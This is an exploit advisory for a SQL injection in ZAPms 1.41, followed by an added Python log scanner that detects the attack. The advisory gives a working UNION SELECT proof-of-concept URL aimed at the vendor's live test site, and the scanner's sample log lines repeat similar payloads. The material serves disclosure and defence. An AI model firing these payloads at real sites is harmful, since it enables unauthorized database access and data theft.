ZAPms 1.41 <= SQL Injection Vulnerability
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
[o] PoC
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
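A defensive check for the flaw above, as an added example that is not part of the original advisory: it scans web access log lines for requests to `products` whose `pid` is not a plain integer. The combined log format, the sample lines and the assumption that legitimate `pid` values are non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate product id is a plain non-negative integer.
VALID_PID_RE = re.compile(r'\d+')
# Tokens that indicate SQL syntax rather than a mistyped id.
SQL_TOKENS_RE = re.compile(r'\b(union|select)\b|--|/\*|\(', re.I)

def check_pid(value):
    """Return None if pid looks legitimate, else a short reason string."""
    if VALID_PID_RE.fullmatch(value):
        return None
    if SQL_TOKENS_RE.search(value):
        return "sql-tokens"
    return "non-numeric"

def scan(log_lines):
    """Return a list of (client_ip, decoded_pid, reason) for suspicious requests."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.rstrip("/").endswith("/products"):
            continue
        # parse_qs decodes '+' and %xx, so encoded payloads are normalised first.
        for pid in parse_qs(url.query, keep_blank_values=True).get("pid", []):
            reason = check_pid(pid)
            if reason:
                findings.append((line.split()[0], pid, reason))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /test/products?pid=14&cid=0&action=details HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /test/products?pid=-14+union+select+1,2,version()--&cid=0 HTTP/1.1" 200 4801',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /test/products?pid=14%20UNION%20SELECT%20user() HTTP/1.1" 200 4801',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /test/news?pid=abc HTTP/1.1" 200 100',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /test/products?pid=14a HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applied server-side before `pid` reaches the query, together with a parameterized statement, closes the injection point itself.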